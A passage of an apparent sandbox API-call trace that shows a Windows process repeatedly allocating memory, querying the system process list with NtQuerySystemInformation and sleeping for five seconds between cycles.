BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.261] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.274] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.278] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.289] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.289] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.289] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.293] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.315] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.323] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.325] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.340] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.340] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.352] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.355] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.373] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.382] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.386] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.387] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.398] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.398] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.402] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.414] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.420] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.429] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.430] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.433] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.445] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.446] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.449] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.465] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.476] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.481] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.492] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.492] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.493] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.495] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.496] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.507] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.508] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.512] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.524] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.524] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.527] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.544] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.559] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0122.576] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0122.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0122.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0122.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0122.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0122.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0122.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 